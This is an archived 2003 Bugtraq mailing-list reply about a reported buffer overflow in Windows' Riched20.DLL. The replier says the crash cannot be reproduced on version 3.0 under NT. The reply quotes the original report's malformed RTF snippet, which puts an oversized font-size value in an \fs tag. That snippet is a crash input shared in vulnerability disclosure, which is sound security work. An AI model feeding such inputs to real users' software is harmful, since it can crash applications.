Re: Riched20.DLL attribute label buffer overflow vulnerability
From: 3APA3A (3APA3A@SECURITY.NNOV.RU)
Date: 02/18/03
- Previous message: Daniel Ahlberg: "GLSA: nethack"
- Maybe in reply to: Jie Dong: "Riched20.DLL attribute label buffer overflow vulnerability"
- Next in thread: Thor Larholm: "Re: Riched20.DLL attribute label buffer overflow vulnerability"
Date: Tue, 18 Feb 2003 11:36:59 +0300
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
To: bugtraq <bugtraq@securityfocus.com>
Dear Jie Dong,
Can't reproduce it on riched20.dll v.3.0 (5.30.23.1200) under NT.
--Sunday, February 16, 2003, 4:30:50 PM, you wrote to bugtraq@securityfocus.com:
JD> The following RTF file may result in illegal operation:
JD> {\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
JD> \fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}} {\colortbl
JD> ;\red255\green0\blue255;} \viewkind4\uc1\pard\cf1\kerning2\f0
JD> \fs18121111111111111111111111111111111110000
JD> www.yoursft.com\fs20\par } "\fs" was used for setting the size of
--
~/ZARAZA
Man is a mystery... I occupy myself with this mystery in order to be a man. (Dostoevsky)